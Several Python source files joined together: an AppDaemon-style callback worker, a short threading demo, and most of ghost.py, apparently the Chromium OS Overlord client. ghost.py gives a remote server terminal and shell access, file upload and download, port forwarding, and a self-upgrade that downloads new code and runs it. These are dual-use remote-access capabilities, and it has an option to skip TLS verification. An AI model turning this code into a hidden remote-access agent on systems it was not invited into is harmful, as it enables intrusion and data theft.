new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]),
)
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(
data["app_name"],
data["ts"],
data["level"],
data["log_type"],
data["message"],
args["kwargs"],
)
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except Exception:
error_logger.warning("-" * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning("-" * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning("-" * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning(
"Logged an error to %s", self.AD.logging.get_filename("error_log"),
)
finally:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, "idle", name, _type, _id),
)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
q.task_done()
def report_callback_sig(self, name, type, funcref, args):
callback_args = {
"scheduler": {"count": 1, "signature": "f(self, kwargs)"},
"state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
"event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
"log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
"initialize": {"count": 0, "signature": "initialize()"},
"terminate": {"count": 0, "signature": "terminate()"},
}
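# For illustration (callback names here are hypothetical), an app callback
# matching the "state" signature above would be declared as
#     def my_state_callback(self, entity, attribute, old, new, kwargs): ...
# while a "scheduler" callback takes only kwargs:
#     def my_timer_callback(self, kwargs): ...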
sig = inspect.signature(funcref)
if type in callback_args:
if len(sig.parameters) != callback_args[type]["count"]:
self.logger.warning(
"Suspect incorrect signature type for callback %s() in %s, should be %s - discarding",
funcref.__name__,
name,
callback_args[type]["signature"],
)
error_logger = logging.getLogger("Error.{}".format(name))
error_logger.warning("-" * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning("-" * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning("-" * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
else:
self.logger.error("Unknown callback type: %s", type)
|
definining_a_thread.py
|
import threading
def function(i):
    print("function called by thread {}\n".format(i))
    return
threads = []
for i in range(5):
    # Instantiate a thread
    t = threading.Thread(target=function, args=(i,))
    threads.append(t)
    # Start running the thread
    t.start()
    # Make the calling thread wait until this thread has finished executing
    t.join()
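# A common variant (illustrative sketch): start all the threads first and join
# them afterwards, so the five calls run concurrently instead of one at a time.
concurrent_threads = []
for i in range(5):
    t = threading.Thread(target=function, args=(i,))
    concurrent_threads.append(t)
    t.start()
for t in concurrent_threads:
    t.join()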
|
ghost.py
|
#!/usr/bin/env python3
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import binascii
import codecs
import contextlib
import ctypes
import ctypes.util
import fcntl
import hashlib
import json
import logging
import os
import platform
import queue
import re
import select
import signal
import socket
import ssl
import struct
import subprocess
import sys
import termios
import threading
import time
import traceback
import tty
import urllib.request
import uuid
import jsonrpclib
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
from cros.factory.gooftool import cros_config as cros_config_module
from cros.factory.test import device_data
from cros.factory.test import state
from cros.factory.test.state import TestState
from cros.factory.test.test_lists import manager
from cros.factory.utils import net_utils
from cros.factory.utils import process_utils
from cros.factory.utils import sys_interface
from cros.factory.utils import sys_utils
from cros.factory.utils.type_utils import Enum
_GHOST_RPC_PORT = int(os.getenv('GHOST_RPC_PORT', '4499'))
_OVERLORD_PORT = int(os.getenv('OVERLORD_PORT', '4455'))
_OVERLORD_LAN_DISCOVERY_PORT = int(os.getenv('OVERLORD_LD_PORT', '4456'))
_OVERLORD_HTTP_PORT = int(os.getenv('OVERLORD_HTTP_PORT', '9000'))
_BUFSIZE = 8192
_RETRY_INTERVAL = 2
_SEPARATOR = b'\r\n'
_PING_TIMEOUT = 3
_PING_INTERVAL = 5
_REQUEST_TIMEOUT_SECS = 60
_SHELL = os.getenv('SHELL', '/bin/bash')
_DEFAULT_BIND_ADDRESS = 'localhost'
_CONTROL_START = 128
_CONTROL_END = 129
_BLOCK_SIZE = 4096
_CONNECT_TIMEOUT = 3
# Stream control
_STDIN_CLOSED = '##STDIN_CLOSED##'
SUCCESS = 'success'
FAILED = 'failed'
DISCONNECTED = 'disconnected'
class PingTimeoutError(Exception):
pass
class RequestError(Exception):
pass
class BufferedSocket:
"""A buffered socket that supports unrecv.
Allows putting data back into the socket buffer for the next recv() call.
"""
def __init__(self, sock):
self.sock = sock
self._buf = b''
def fileno(self):
return self.sock.fileno()
def Recv(self, bufsize, flags=0):
if self._buf:
if len(self._buf) >= bufsize:
ret = self._buf[:bufsize]
self._buf = self._buf[bufsize:]
return ret
ret = self._buf
self._buf = b''
return ret + self.sock.recv(bufsize - len(ret), flags)
return self.sock.recv(bufsize, flags)
def UnRecv(self, buf):
self._buf = buf + self._buf
def Send(self, *args, **kwargs):
return self.sock.send(*args, **kwargs)
def RecvBuf(self):
"""Only recive from buffer."""
ret = self._buf
self._buf = b''
return ret
def Close(self):
self.sock.close()
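# Illustrative usage sketch (the helper name below is hypothetical): UnRecv()
# pushes bytes back so that the next Recv() call returns them again.
def _demo_buffered_socket():
  a, b = socket.socketpair()
  try:
    b.sendall(b'hello world')
    bsock = BufferedSocket(a)
    first = bsock.Recv(5)   # reads b'hello' from the socket
    bsock.UnRecv(first)     # push it back onto the internal buffer
    assert bsock.Recv(5) == b'hello'
  finally:
    a.close()
    b.close()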
class TLSSettings:
def __init__(self, tls_cert_file, verify):
"""Constructor.
Args:
tls_cert_file: TLS certificate in PEM format.
verify: whether to verify the server certificate.
"""
self._enabled = False
self._tls_cert_file = tls_cert_file
self._verify = verify
self._tls_context = None
def _UpdateContext(self):
if not self._enabled:
self._tls_context = None
return
self._tls_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self._tls_context.verify_mode = ssl.CERT_REQUIRED
if self._verify:
if self._tls_cert_file:
self._tls_context.check_hostname = True
try:
self._tls_context.load_verify_locations(self._tls_cert_file)
logging.info('TLSSettings: using user-supplied ca-certificate')
except IOError as e:
logging.error('TLSSettings: %s: %s', self._tls_cert_file, e)
sys.exit(1)
else:
self._tls_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
logging.info('TLSSettings: using built-in ca-certificates')
else:
self._tls_context.verify_mode = ssl.CERT_NONE
logging.info('TLSSettings: skipping TLS verification!!!')
def SetEnabled(self, enabled):
logging.info('TLSSettings: enabled: %s', enabled)
if self._enabled != enabled:
self._enabled = enabled
self._UpdateContext()
def Enabled(self):
return self._enabled
def Context(self):
return self._tls_context
class Ghost:
"""Ghost implements the client protocol of Overlord.
Ghost provides terminal/shell/logcat functionality and manages the client
side connectivity.
"""
NONE, AGENT, TERMINAL, SHELL, LOGCAT, FILE, FORWARD = range(7)
MODE_NAME = {
NONE: 'NONE',
AGENT: 'Agent',
TERMINAL: 'Terminal',
SHELL: 'Shell',
LOGCAT: 'Logcat',
FILE: 'File',
FORWARD: 'Forward'
}
RANDOM_MID = '##random_mid##'
def __init__(self, overlord_addrs, tls_settings=None, mode=AGENT, mid=None,
sid=None, prop_file=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None, tls_mode=None,
ovl_path=None, certificate_dir=None):
"""Constructor.
Args:
overlord_addrs: a list of possible address of overlord.
tls_settings: a TLSSetting object.
mode: client mode, either AGENT, SHELL or LOGCAT
mid: a str to set for machine ID. If mid equals Ghost.RANDOM_MID, machine
id is randomly generated.
sid: session ID. If the connection is requested by overlord, sid should
be set to the corresponding session id assigned by overlord.
prop_file: properties file filename.
terminal_sid: the terminal session ID associated with this client. This is
used for file download.
tty_device: the terminal device to open. If tty_device is None, a pseudo
terminal will be opened instead.
command: the command to execute when we are in SHELL mode.
file_op: a tuple (action, filepath, perm). action is either 'download' or
'upload'. perm is the permission to set for the file.
port: port number to forward.
tls_mode: can be [True, False, None]. If not None, skip detection of
TLS and assume whether the server uses TLS or not.
ovl_path: path to ovl tool.
certificate_dir: path to overlord certificate directory
"""
assert mode in [Ghost.AGENT, Ghost.TERMINAL, Ghost.SHELL, Ghost.FILE,
Ghost.FORWARD]
if mode == Ghost.SHELL:
assert command is not None
if mode == Ghost.FILE:
assert file_op is not None
self._platform = platform.system()
self._overlord_addrs = overlord_addrs
self._connected_addr = None
self._tls_settings = tls_settings
self._mid = mid
self._sock = None
self._mode = mode
self._machine_id = self.GetMachineID()
self._session_id = sid if sid is not None else str(uuid.uuid4())
self._terminal_session_id = terminal_sid
self._ttyname_to_sid = {}
self._terminal_sid_to_pid = {}
self._prop_file = prop_file
self._properties = {}
self._register_status = DISCONNECTED
self._reset = threading.Event()
self._tls_mode = tls_mode
self._ovl_path = ovl_path
self._certificate_dir = certificate_dir
# The information of track_connection is lost after ghost restart.
self._track_connection = None
self._track_connection_timeout_secs = 900
# RPC
self._requests = {}
self._queue = queue.Queue()
# Protocol specific
self._last_ping = 0
self._tty_device = tty_device
self._shell_command = command
self._file_op = file_op
self._download_queue = queue.Queue()
self._port = port
def SetIgnoreChild(self, status):
# Only ignore child for Agent since only it could spawn child Ghost.
if self._mode == Ghost.AGENT:
signal.signal(signal.SIGCHLD,
signal.SIG_IGN if status else signal.SIG_DFL)
def GetFileSha1(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha1(f.read()).hexdigest()
def TLSEnabled(self, host, port):
"""Determine if TLS is enabled on given server address."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Allow any certificate since we only want to check if server talks TLS.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=host)
sock.settimeout(_CONNECT_TIMEOUT)
sock.connect((host, port))
return True
except ssl.SSLError:
return False
except socket.timeout:
return False
except socket.error: # Connect refused or timeout
raise
except Exception:
return False # For whatever reason above failed, assume False
def Upgrade(self):
logging.info('Upgrade: initiating upgrade sequence...')
try:
https_enabled = self.TLSEnabled(self._connected_addr[0],
_OVERLORD_HTTP_PORT)
except socket.error:
logging.error('Upgrade: failed to connect to Overlord HTTP server, '
'abort')
return
if self._tls_settings.Enabled() and not https_enabled:
logging.error('Upgrade: TLS enforced but found Overlord HTTP server '
'without TLS enabled! Possible mis-configuration or '
'DNS/IP spoofing detected, abort')
return
scriptpath = os.path.abspath(sys.argv[0])
url = 'http%s://%s:%d/upgrade/ghost.py' % (
's' if https_enabled else '', self._connected_addr[0],
_OVERLORD_HTTP_PORT)
# Download sha1sum for ghost.py for verification
try:
with contextlib.closing(
urllib.request.urlopen(url + '.sha1', timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
sha1sum = f.read().strip().decode('utf-8')  # bytes -> str for the hexdigest comparisons below
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download sha1sum file, abort')
return
if self.GetFileSha1(scriptpath) == sha1sum:
logging.info('Upgrade: ghost is already up-to-date, skipping upgrade')
return
# Download upgrade version of ghost.py
try:
with contextlib.closing(
urllib.request.urlopen(url, timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
data = f.read()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download upgrade, abort')
return
# Compare SHA1 sum
if hashlib.sha1(data).hexdigest() != sha1sum:
logging.error('Upgrade: sha1sum mismatch, abort')
return
try:
with open(scriptpath, 'wb') as f:
f.write(data)
except Exception:
logging.error('Upgrade: failed to write upgrade onto disk, abort')
return
logging.info('Upgrade: restarting ghost...')
self.CloseSockets()
self.SetIgnoreChild(False)
os.execve(scriptpath, [scriptpath] + sys.argv[1:], os.environ)
def LoadProperties(self):
try:
if self._prop_file:
with open(self._prop_file, 'r') as f:
self._properties = json.loads(f.read())
if self._ovl_path:
self._properties['ovl_path'] = self._ovl_path
if self._certificate_dir:
self._properties['certificate_dir'] = self._certificate_dir
except Exception as e:
logging.error('LoadProperties: %s', e)
def CloseSockets(self):
# Close sockets opened by parent process, since we don't use it anymore.
if self._platform == 'Linux':
for fd in os.listdir('/proc/self/fd/'):
try:
real_fd = os.readlink('/proc/self/fd/%s' % fd)
if real_fd.startswith('socket'):
os.close(int(fd))
except Exception:
pass
def SpawnGhost(self, mode, sid=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None):
"""Spawn a child ghost with specific mode.
Returns:
The spawned child process pid.
"""
# Restore the default signal handler, so our child won't have problems.
self.SetIgnoreChild(False)
pid = os.fork()
if pid == 0:
self.CloseSockets()
g = Ghost([self._connected_addr], tls_settings=self._tls_settings,
mode=mode, mid=Ghost.RANDOM_MID, sid=sid,
terminal_sid=terminal_sid, tty_device=tty_device,
command=command, file_op=file_op, port=port)
g.Start()
sys.exit(0)
else:
self.SetIgnoreChild(True)
return pid
def Timestamp(self):
return int(time.time())
def GetGateWayIP(self):
if self._platform == 'Darwin':
output = process_utils.CheckOutput(['route', '-n', 'get', 'default'])
ret = re.search('gateway: (.*)', output)
if ret:
return [ret.group(1)]
return []
if self._platform == 'Linux':
with open('/proc/net/route', 'r') as f:
lines = f.readlines()
ips = []
for line in lines:
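# /proc/net/route fields are tab-separated; the third column is the gateway
# as a little-endian hex IPv4 address. Skip rows without a gateway and
# convert the rest to dotted-quad form.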
parts = line.split('\t')
if parts[2] == '00000000':
continue
try:
h = codecs.decode(parts[2], 'hex')
ips.append('.'.join([str(x) for x in reversed(h)]))
except (TypeError, binascii.Error):
pass
return ips
logging.warning('GetGateWayIP: unsupported platform')
return []
def GetFactoryServerIP(self):
try:
from cros.factory.test import server_proxy
url = server_proxy.GetServerURL()
match = re.match(r'^https?://(.*):.*$', url)
if match:
return [match.group(1)]
except Exception:
pass
return []
def GetMachineID(self):
"""Generates machine-dependent ID string for a machine.
There are many ways to generate a machine ID:
Linux:
1. factory device_id
2. /sys/class/dmi/id/product_uuid (only available on intel machines)
3. MAC address
We follow the listed order to generate the machine ID, and fall back to the
next alternative if the previous doesn't work.
Darwin:
All Darwin systems should have the IOPlatformSerialNumber attribute.
"""
if self._mid == Ghost.RANDOM_MID:
return str(uuid.uuid4())
if self._mid:
return self._mid
# Darwin
if self._platform == 'Darwin':
output = process_utils.CheckOutput(['ioreg', '-rd1', '-c',
'IOPlatformExpertDevice'])
ret = re.search('"IOPlatformSerialNumber" = "(.*)"', output)
if ret:
return ret.group(1)
# Try factory device id
try:
from cros.factory.test import session
return session.GetDeviceID()
except Exception:
pass
# Try DMI product UUID
try:
with open('/sys/class/dmi/id/product_uuid', 'r') as f:
return f.read().strip()
except Exception:
pass
# Use MAC address if none of the above is available
try:
macs = []
ifaces = sorted(os.listdir('/sys/class/net'))
for iface in ifaces:
if iface == 'lo':
continue
with open('/sys/class/net/%s/address' % iface, 'r') as f:
macs.append(f.read().strip())
return ';'.join(macs)
except Exception:
pass
raise RuntimeError("can't generate machine ID")
def GetProcessWorkingDirectory(self, pid):
if self._platform == 'Linux':
return os.readlink('/proc/%d/cwd' % pid)
if self._platform == 'Darwin':
PROC_PIDVNODEPATHINFO = 9
proc_vnodepathinfo_size = 2352
vid_path_offset = 152
proc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('libproc'))
buf = ctypes.create_string_buffer(proc_vnodepathinfo_size)  # zero-initialized buffer
proc.proc_pidinfo(pid, PROC_PIDVNODEPATHINFO, 0,
ctypes.byref(buf), proc_vnodepathinfo_size)
buf = buf.raw[vid_path_offset:]
n = buf.index(b'\0')
return buf[:n].decode('utf-8')
raise RuntimeError('GetProcessWorkingDirectory: unsupported platform')
def Reset(self):
"""Reset state and clear request handlers."""
if self._sock is not None:
self._sock.Close()
self._sock = None
self._reset.clear()
self._last_ping = 0
self._requests = {}
self.LoadProperties()
self._register_status = DISCONNECTED
def SendMessage(self, msg):
"""Serialize the message and send it through the socket."""
self._sock.Send(json.dumps(msg).encode('utf-8') + _SEPARATOR)
def SendRequest(self, name, args, handler=None,
timeout=_REQUEST_TIMEOUT_SECS):
if handler and not callable(handler):
raise RequestError('Invalid request handler for msg "%s"' % name)
rid = str(uuid.uuid4())
msg = {'rid': rid, 'timeout': timeout, 'name': name, 'params': args}
if timeout >= 0:
self._requests[rid] = [self.Timestamp(), timeout, handler]
self.SendMessage(msg)
def SendResponse(self, omsg, status, params=None):
msg = {'rid': omsg['rid'], 'response': status, 'params': params}
self.SendMessage(msg)
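# Illustrative wire format: every request/response is a single JSON object
# terminated by _SEPARATOR (b'\r\n'), e.g.
#   {"rid": "<uuid>", "timeout": 60, "name": "ping", "params": {}}\r\n
#   {"rid": "<uuid>", "response": "success", "params": null}\r\n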
def HandleTTYControl(self, fd, control_str):
msg = json.loads(control_str)
command = msg['command']
params = msg['params']
if command == 'resize':
# some error happened on websocket
if len(params) != 2:
return
winsize = struct.pack('HHHH', params[0], params[1], 0, 0)
fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize)
else:
logging.warning('Invalid request command "%s"', command)
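# Illustrative control payload: a resize to 24 rows x 80 columns arrives as the
# JSON {"command": "resize", "params": [24, 80]} framed between the
# _CONTROL_START and _CONTROL_END bytes.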
def SpawnTTYServer(self, unused_var):
"""Spawn a TTY server and forward I/O to the TCP socket."""
logging.info('SpawnTTYServer: started')
try:
if self._tty_device is None:
pid, fd = os.forkpty()
if pid == 0:
ttyname = os.ttyname(sys.stdout.fileno())
try:
server = GhostRPCServer()
server.RegisterTTY(self._session_id, ttyname)
server.RegisterSession(self._session_id, os.getpid())
except Exception:
# If ghost is launched without RPC server, the call will fail but we
# can ignore it.
pass
# The directory that contains the current running ghost script
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['USER'] = os.getenv('USER', 'root')
env['HOME'] = os.getenv('HOME', '/root')
env['PATH'] = os.getenv('PATH') + ':%s' % script_dir
os.chdir(env['HOME'])
os.execve(_SHELL, [_SHELL], env)
else:
fd = os.open(self._tty_device, os.O_RDWR)
tty.setraw(fd)
# 0: iflag
# 1: oflag
# 2: cflag
# 3: lflag
# 4: ispeed
# 5: ospeed
# 6: cc
attr = termios.tcgetattr(fd)
attr[0] &= (termios.IXON | termios.IXOFF)
attr[2] |= termios.CLOCAL
attr[2] &= ~termios.CRTSCTS
attr[4] = termios.B115200
attr[5] = termios.B115200
termios.tcsetattr(fd, termios.TCSANOW, attr)
nonlocals = {
'control_state': None,
'control_str': b''
}
def _ProcessBuffer(buf):
write_buffer = b''
while buf:
if nonlocals['control_state']:
if _CONTROL_END in buf:
index = buf.index(_CONTROL_END)
nonlocals['control_str'] += buf[:index]
self.HandleTTYControl(fd, nonlocals['control_str'])
nonlocals['control_state'] = None
nonlocals['control_str'] = b''
buf = buf[index+1:]
else:
nonlocals['control_str'] += buf
buf = b''
else:
if _CONTROL_START in buf:
nonlocals['control_state'] = _CONTROL_START
index = buf.index(_CONTROL_START)
write_buffer += buf[:index]
buf = buf[index+1:]
else:
write_buffer += buf
buf = b''
if write_buffer:
os.write(fd, write_buffer)
_ProcessBuffer(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, fd], [], [])
if fd in rd:
self._sock.Send(os.read(fd, _BUFSIZE))
if self._sock in rd:
buf = self._sock.Recv(_BUFSIZE)
if not buf:
raise RuntimeError('connection terminated')
_ProcessBuffer(buf)
except Exception as e:
logging.error('SpawnTTYServer: %s', e, exc_info=True)
finally:
self._sock.Close()
logging.info('SpawnTTYServer: terminated')
os._exit(0) # pylint: disable=protected-access
def SpawnShellServer(self, unused_var):
"""Spawn a shell server and forward input/output from/to the TCP socket."""
logging.info('SpawnShellServer: started')
# Add ghost executable to PATH
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['PATH'] = '%s:%s' % (script_dir, os.getenv('PATH'))
# Execute shell command from HOME directory
os.chdir(os.getenv('HOME', '/tmp'))
p = subprocess.Popen(self._shell_command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, env=env)
def make_non_block(fd):
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
make_non_block(p.stdout)
make_non_block(p.stderr)
try:
p.stdin.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select(
[p.stdout, p.stderr, self._sock], [], [])
if p.stdout in rd:
self._sock.Send(p.stdout.read(_BUFSIZE))
if p.stderr in rd:
self._sock.Send(p.stderr.read(_BUFSIZE))
if self._sock in rd:
ret = self._sock.Recv(_BUFSIZE)
if not ret:
raise RuntimeError('connection terminated')
try:
idx = ret.index((_STDIN_CLOSED * 2).encode('utf-8'))
p.stdin.write(ret[:idx])
p.stdin.close()
except ValueError:
p.stdin.write(ret)
p.poll()
if p.returncode is not None:
break
except Exception as e:
logging.error('SpawnShellServer: %s', e, exc_info=True)
finally:
# Check if the process has terminated. If not, send SIGTERM, wait for
# 1 second, then send SIGKILL to make sure the process is terminated.
p.poll()
if p.returncode is None:
try:
p.terminate()
time.sleep(1)
p.kill()
except Exception:
pass
p.wait()
self._sock.Close()
logging.info('SpawnShellServer: terminated')
os._exit(0) # pylint: disable=protected-access
def InitiateFileOperation(self, unused_var):
if self._file_op[0] == 'download':
try:
size = os.stat(self._file_op[1]).st_size
except OSError as e:
logging.error('InitiateFileOperation: download: %s', e)
sys.exit(1)
self.SendRequest('request_to_download',
{'terminal_sid': self._terminal_session_id,
'filename': os.path.basename(self._file_op[1]),
'size': size})
elif self._file_op[0] == 'upload':
self.SendRequest('clear_to_upload', {}, timeout=-1)
self.StartUploadServer()
else:
logging.error('InitiateFileOperation: unknown file operation, ignored')
def StartDownloadServer(self):
logging.info('StartDownloadServer: started')
try:
with open(self._file_op[1], 'rb') as f:
while True:
data = f.read(_BLOCK_SIZE)
if not data:
break
self._sock.Send(data)
except Exception as e:
logging.error('StartDownloadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartDownloadServer: terminated')
os._exit(0) # pylint: disable=protected-access
def StartUploadServer(self):
logging.info('StartUploadServer: started')
try:
filepath = self._file_op[1]
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except Exception:
pass
with open(filepath, 'wb') as f:
if self._file_op[2]:
os.fchmod(f.fileno(), self._file_op[2])
f.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock], [], [])
if self._sock in rd:
buf = self._sock.Recv(_BLOCK_SIZE)
if not buf:
break
f.write(buf)
except socket.error as e:
logging.error('StartUploadServer: socket error: %s', e)
except Exception as e:
logging.error('StartUploadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartUploadServer: terminated')
os._exit(0) # pylint: disable=protected-access
def SpawnPortForwardServer(self, unused_var):
"""Spawn a port forwarding server and forward I/O to the TCP socket."""
logging.info('SpawnPortForwardServer: started')
src_sock = None
try:
src_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
src_sock.settimeout(_CONNECT_TIMEOUT)
src_sock.connect(('localhost', self._port))
src_sock.send(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, src_sock], [], [])
if self._sock in rd:
data = self._sock.Recv(_BUFSIZE)
if not data:
raise RuntimeError('connection terminated')
src_sock.send(data)
if src_sock in rd:
data = src_sock.recv(_BUFSIZE)
if not data:
continue
self._sock.Send(data)
except Exception as e:
logging.error('SpawnPortForwardServer: %s', e)
finally:
if src_sock:
src_sock.close()
self._sock.Close()
logging.info('SpawnPortForwardServer: terminated')
os._exit(0) # pylint: disable=protected-access
def Ping(self):
def timeout_handler(x):
if x is None:
raise PingTimeoutError
self._last_ping = self.Timestamp()
self.SendRequest('ping', {}, timeout_handler, 5)
def HandleFileDownloadRequest(self, msg):
params = msg['params']
filepath = params['filename']
if not os.path.isabs(filepath):
filepath = os.path.join(os.getenv('HOME', '/tmp'), filepath)
try:
with open(filepath, 'r') as _:
pass
except Exception as e:
self.SendResponse(msg, str(e))
return
self.SpawnGhost(self.FILE, params['sid'],
file_op=('download', filepath))
self.SendResponse(msg, SUCCESS)
def HandleFileUploadRequest(self, msg):
params = msg['params']
# Resolve upload filepath
filename = params['filename']
dest_path = filename
# If dest is specified, use it first
dest_path = params.get('dest', '')
if dest_path:
if not os.path.isabs(dest_path):
dest_path = os.path.join(os.getenv('HOME', '/tmp'), dest_path)
if os.path.isdir(dest_path):
dest_path = os.path.join(dest_path, filename)
else:
target_dir = os.getenv('HOME', '/tmp')
# Terminal session ID found, upload to its current working directory
if 'terminal_sid' in params:
pid = self._terminal_sid_to_pid.get(params['terminal_sid'], None)
if pid:
try:
target_dir = self.GetProcessWorkingDirectory(pid)
except Exception as e:
logging.error(e)
dest_path = os.path.join(target_dir, filename)
try:
os.makedirs(os.path.dirname(dest_path))
except Exception:
pass
try:
with open(dest_path, 'w') as _:
pass
except Exception as e:
self.SendResponse(msg, str(e))
return
# If not check_only, spawn FILE mode ghost agent to handle upload
if not params.get('check_only', False):
self.SpawnGhost(self.FILE, params['sid'],
file_op=('upload', dest_path, params.get('perm', None)))
self.SendResponse(msg, SUCCESS)
def HandleRequest(self, msg):
command = msg['name']
params = msg['params']
if command == 'upgrade':
self.Upgrade()
elif command == 'terminal':
self.SpawnGhost(self.TERMINAL, params['sid'],
tty_device=params['tty_device'])
self.SendResponse(msg, SUCCESS)
elif command == 'shell':
self.SpawnGhost(self.SHELL, params['sid'], command=params['command'])
self.SendResponse(msg, SUCCESS)
elif command == 'file_download':
self.HandleFileDownloadRequest(msg)
elif command == 'clear_to_download':
self.StartDownloadServer()
elif command == 'file_upload':
self.HandleFileUploadRequest(msg)
elif command == 'forward':
self.SpawnGhost(self.FORWARD, params['sid'], port=params['port'])
self.SendResponse(msg, SUCCESS)
def HandleResponse(self, response):
rid = str(response['rid'])
if rid in self._requests:
handler = self._requests[rid][2]
del self._requests[rid]
if callable(handler):
handler(response)
else:
logging.warning('Received unsolicited response, ignored')
def ParseMessage(self, buf, single=True):
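"""Parse JSON messages framed by _SEPARATOR and dispatch them.
If single is True, only the first complete message in buf is handled and the
remainder is pushed back with UnRecv(); otherwise every complete message is
handled and only the trailing partial message is pushed back.
"""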
if single:
try:
index = buf.index(_SEPARATOR)
except ValueError:
self._sock.UnRecv(buf)
return
msgs_json = [buf[:index]]
self._sock.UnRecv(buf[index + 2:])
else:
msgs_json = buf.split(_SEPARATOR)
self._sock.UnRecv(msgs_json.pop())
for msg_json in msgs_json:
try:
msg = json.loads(msg_json)
except ValueError:
# Ignore mal-formed message.
logging.error('mal-formed JSON request, ignored')
continue
if 'name' in msg:
self.HandleRequest(msg)
elif 'response' in msg:
self.HandleResponse(msg)
else:  # Ignore mal-formed message.
logging.error('mal-formed JSON request, ignored')
def ScanForTimeoutRequests(self):
"""Scans for pending requests which have timed out.
If any timed-out requests are discovered, their handler is called with the
special response value of None.
"""
for rid in list(self._requests):
request_time, timeout, handler = self._requests[rid]
if self.Timestamp() - request_time > timeout:
if callable(handler):
handler(None)
else:
logging.error('Request %s timeout', rid)
del self._requests[rid]
def InitiateDownload(self):
ttyname, filename = self._download_queue.get()
sid = self._ttyname_to_sid[ttyname]
self.SpawnGhost(self.FILE, terminal_sid=sid,
file_op=('download', filename))
def Listen(self):
try:
while True:
rds, unused_wd, unused_xd = select.select([self._sock], [], [],
_PING_INTERVAL // 2)
if self._sock in rds:
data = self._sock.Recv(_BUFSIZE)
# Socket is closed
if not data:
break
self.ParseMessage(data, self._register_status != SUCCESS)
if (self._mode == self.AGENT and
self.Timestamp() - self._last_ping > _PING_INTERVAL):
self.Ping()
self.ScanForTimeoutRequests()
if not self._download_queue.empty():
self.InitiateDownload()
if self._reset.is_set():
break
except socket.error:
raise RuntimeError('Connection dropped')
except PingTimeoutError:
raise RuntimeError('Connection timeout')
finally:
self.Reset()
self._queue.put('resume')
if self._mode != Ghost.AGENT:
sys.exit(1)
def Register(self):
non_local = {}
for addr in self._overlord_addrs:
non_local['addr'] = addr
def registered(response):
if response is None:
self._reset.set()
raise RuntimeError('Register request timeout')
self._register_status = response['response']
if response['response'] != SUCCESS:
self._reset.set()
raise RuntimeError('Register: ' + response['response'])
logging.info('Registered with Overlord at %s:%d', *non_local['addr'])
self._connected_addr = non_local['addr']
self.Upgrade() # Check for upgrade
self._queue.put('pause', True)
try:
logging.info('Trying %s:%d ...', *addr)
self.Reset()
# Check if server has TLS enabled. Only check if self._tls_mode is
# None.
# Only the control channel needs to determine if TLS is enabled. Other modes
# should use the TLSSettings passed in when they were spawned.
if self._mode == Ghost.AGENT:
self._tls_settings.SetEnabled(
self.TLSEnabled(*addr) if self._tls_mode is None
else self._tls_mode)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(_CONNECT_TIMEOUT)
try:
if self._tls_settings.Enabled():
tls_context = self._tls_settings.Context()
sock = tls_context.wrap_socket(sock, server_hostname=addr[0])
sock.connect(addr)
